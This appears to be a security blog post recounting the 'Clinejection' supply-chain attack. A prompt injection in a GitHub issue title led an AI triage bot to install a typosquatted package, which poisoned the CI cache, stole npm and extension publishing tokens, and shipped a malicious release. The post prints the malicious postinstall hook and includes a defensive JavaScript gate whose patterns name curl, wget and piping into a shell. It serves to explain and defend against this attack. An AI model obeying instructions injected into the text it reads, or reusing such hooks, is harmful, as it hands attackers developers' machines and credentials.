How a 12-Word Issue Title Owned 4,000 Developer Machines
TLDR
One GitHub issue title. Five steps. 4,000 compromised developer machines. Eight hours before anyone noticed.
The entry point wasn’t a zero-day. It wasn’t a misconfigured S3 bucket or a stolen password. It was natural language, a crafted string in an issue title that an AI triage bot read, interpreted as an instruction, and executed with full CI privileges.
This is Clinejection. It’s worth understanding in detail, because the attack surface it exposed isn’t unique to Cline. It’s in your repo too.
The Attack Chain Nobody Had a Playbook For
On February 17, 2026, someone published cline@2.3.0 to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json:
```json
"postinstall": "npm install -g openclaw@latest"
```
For the next eight hours, every developer who installed or updated Cline got OpenClaw—a separate AI agent with full system access—silently installed on their machine. About 4,000 downloads before the package was pulled.
Here’s how the attacker got the npm token to publish it.
Step 1: Prompt Injection Via Issue Title
Cline had deployed an AI-powered issue triage workflow using Anthropic’s claude-code-action. The workflow allowed any GitHub user to trigger it by opening an issue. The issue title was interpolated directly into Claude’s prompt:
```yaml
${{ github.event.issue.title }}
```
No sanitisation. The attacker opened Issue #8904 with a title that looked like a performance report but contained an embedded instruction: install a package from a specific GitHub repository.
Claude read the issue title as part of the prompt. Claude followed the instruction. That’s prompt injection. It’s well-documented. It’s not new. It just hadn’t been weaponised against a CI workflow at this scale before.
Step 2: The Bot Executes Arbitrary Code
Claude ran npm install pointing to the attacker’s fork—a typosquatted repository named glthub-actions/cline. Note the missing ‘i’ in ‘github’. The fork’s package.json contained a preinstall script that fetched and executed a remote shell script.
This is where most engineers mentally say “we would catch that.” You wouldn’t. The bot ran with the privileges of the CI environment. There was no human in the loop. The operation looked like routine dependency installation.
Step 3: Cache Poisoning
The shell script deployed Cacheract—a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of data, triggering GitHub’s LRU eviction policy. The legitimate cache entries got evicted. The poisoned entries were keyed to match the pattern used by Cline’s nightly release workflow.
When that workflow ran and restored node_modules from cache, it got the compromised version.
Step 4: Credential Theft
The compromised node_modules ran during the release workflow—the one that held NPM_RELEASE_TOKEN, VSCE_PAT, and OVSX_PAT. All three exfiltrated.
Step 5: Malicious Publish
Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. The package was live for eight hours before StepSecurity’s automated monitoring flagged it—approximately 14 minutes after publication.
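The malicious release differed from its predecessor only by an install-time hook in package.json, which is something a release gate can check mechanically. The sketch below is an added example, not code from Cline, npm, or StepSecurity; the function names, the risk heuristics, and the sample manifests are assumptions, and only the postinstall string comes from the article.

```javascript
// Added example: compare a release candidate's package.json with the
// previously published one and report install-time hooks added or changed.

// Scripts npm runs automatically on install ("prepare" runs for git dependencies).
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristics for hook commands that pull in more code (assumed, not exhaustive).
const RISK_PATTERNS = [
  ["installs another package", /\b(npm|pnpm|yarn)\s+(install|i|add)\b/],
  ["global install", /\s(-g|--global)\b/],
  ["unpinned @latest", /@latest\b/],
  ["network fetch", /\b(curl|wget)\b/],
  ["pipes into a shell", /\|\s*(ba|z)?sh\b/],
];

function classify(command) {
  return RISK_PATTERNS.filter(([, re]) => re.test(command)).map(([label]) => label);
}

function diffInstallHooks(prevManifest, nextManifest) {
  const prev = prevManifest.scripts || {};
  const next = nextManifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    // Unchanged or absent hooks are not findings; only new or edited ones are.
    if (next[hook] === undefined || next[hook] === prev[hook]) continue;
    findings.push({
      hook,
      change: prev[hook] === undefined ? "added" : "modified",
      command: next[hook],
      reasons: classify(next[hook]),
    });
  }
  return findings;
}

// Policy assumed here: any new or changed install hook holds the release for review.
function releaseGate(prevManifest, nextManifest) {
  const findings = diffInstallHooks(prevManifest, nextManifest);
  return { allow: findings.length === 0, findings };
}

// Constructed manifests; the postinstall value is the line quoted in the article.
const previous = { name: "example-cli", version: "1.0.0", scripts: { test: "node test.js" } };
const candidate = {
  name: "example-cli",
  version: "1.0.1",
  scripts: { test: "node test.js", postinstall: "npm install -g openclaw@latest" },
};

console.log(JSON.stringify(releaseGate(previous, candidate), null, 2));
```

Run against the two manifests of consecutive releases, the gate reports the added postinstall hook even when every other file in the package is unchanged.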
The Botched Rotation That Made It Worse
Security researcher Adnan Khan had discovered and reported the full vulnerability chain on January 1, 2026. He followed up multiple times over five weeks. No response.
When Khan publicly disclosed on February 9, Cline patched within 30 minutes by removing the AI triage workflows. They started credential rotation the next day.
Then they deleted the wrong token. The exposed one stayed active. They caught the error on February 11 and re-rotated—but the attacker had already exfiltrated the credentials, and the npm token remained valid long enough to publish six days later.
A separate, unknown actor had found Khan’s proof-of-concept on his test repository and weaponised it.


